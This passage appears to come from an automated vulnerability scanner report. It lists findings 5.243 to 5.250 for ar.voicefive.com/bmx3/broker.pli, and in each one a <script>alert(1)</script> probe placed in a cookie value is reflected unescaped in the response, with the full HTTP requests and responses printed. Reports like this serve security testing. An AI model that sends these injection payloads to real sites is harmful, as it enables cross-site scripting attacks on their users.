if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638381",Pid:"p91136705",Arc:"211671727",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C60dd7<script>alert(1)</script>dccd8ad0c81', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

5.243. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 896ae<script>alert(1)</script>4b73efe183f was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046896ae<script>alert(1)</script>4b73efe183f

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:25 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:25 2011&recExp=Tue Apr 26 18:36:25 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:25 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842985; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
13848&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046896ae<script>alert(1)</script>4b73efe183f', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.244. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload c3e3b<script>alert(1)</script>be3830adad1 was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&c3e3b<script>alert(1)</script>be3830adad1; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:24 2011&recExp=Tue Apr 26 18:36:24 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842984; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
11&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&c3e3b<script>alert(1)</script>be3830adad1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/
...[SNIP]...

5.245. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload b9d14<script>alert(1)</script>610a34ff3d4 was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&b9d14<script>alert(1)</script>610a34ff3d4; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:23 2011&recExp=Tue Apr 26 18:36:23 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842983; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
Apr 26 14:21:11 2011&prad=253732015&arc=178113848&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&b9d14<script>alert(1)</script>610a34ff3d4', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

5.246. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload b4cb4<script>alert(1)</script>942e4e48996 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=194941084 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0078565546631069&output=html&h=90&slotname=0597910248&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&dt=1303854583029&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303854583063&frm=1&adk=362780761&ga_vid=81945644.1303854583&ga_sid=1303854583&ga_hid=1074700742&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3993542599&fu=0&ifi=1&dtd=40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&; ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&b4cb4<script>alert(1)</script>942e4e48996; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 21:52:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=25&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 21:52:05 2011&prad=256163696&arc=194941084&; expires=Mon 25-Jul-2011 21:52:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303854725; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25374

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"194941084",Location:
...[SNIP]...
;})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=1&initExp=Tue Apr 26 18:40:08 2011&recExp=Tue Apr 26 18:40:08 2011&prad=296638381&arc=211671727&b4cb4<script>alert(1)</script>942e4e48996', "ar_p97174789": 'exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&', "ar_p92429851": 'exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 1
...[SNIP]...

5.247. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d7644<script>alert(1)</script>88902fd901f was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d7644<script>alert(1)</script>88902fd901f; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:23 2011&recExp=Tue Apr 26 18:36:23 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842983; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d7644<script>alert(1)</script>88902fd901f', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobu
...[SNIP]...

5.248. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 6fac2<script>alert(1)</script>42593258a81 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p91136705&PRAd=296638381&AR_C=211671727 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638381/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&6fac2<script>alert(1)</script>42593258a81; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303842976%2E104%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:40:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p91136705=exp=1&initExp=Tue Apr 26 18:40:28 2011&recExp=Tue Apr 26 18:40:28 2011&prad=296638381&arc=211671727&; expires=Mon 25-Jul-2011 18:40:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26481

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638381",Pid:"p91136705",Arc:"211671727",Location:
...[SNIP]...
91151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '1', "ar_p92429851": 'exp=1&initExp=Tue Apr 26 18:36:13 2011&recExp=Tue Apr 26 18:36:13 2011&prad=296638382&arc=200925855&6fac2<script>alert(1)</script>42593258a81', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

5.249. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload 86eb2<script>alert(1)</script>7f5234ca961 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&86eb2<script>alert(1)</script>7f5234ca961; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:24 2011&recExp=Tue Apr 26 18:36:24 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842984; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"296638382",Pid:"p92429851",Arc:"200925855",Location:
...[SNIP]...
})();}COMSCORE.BMX.Broker.Cookies={ "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p97174789": 'exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&86eb2<script>alert(1)</script>7f5234ca961', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 201
...[SNIP]...

5.250. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload d9b4a<script>alert(1)</script>cfcd3ff335d was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p92429851&PRAd=296638382&AR_C=200925855 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1d9b4a<script>alert(1)</script>cfcd3ff335d; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 18:36:24 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p92429851=exp=1&initExp=Tue Apr 26 18:36:24 2011&recExp=Tue Apr 26 18:36:24 2011&prad=296638382&arc=200925855&; expires=Mon 25-Jul-2011 18:36:24 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303842984; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 30505

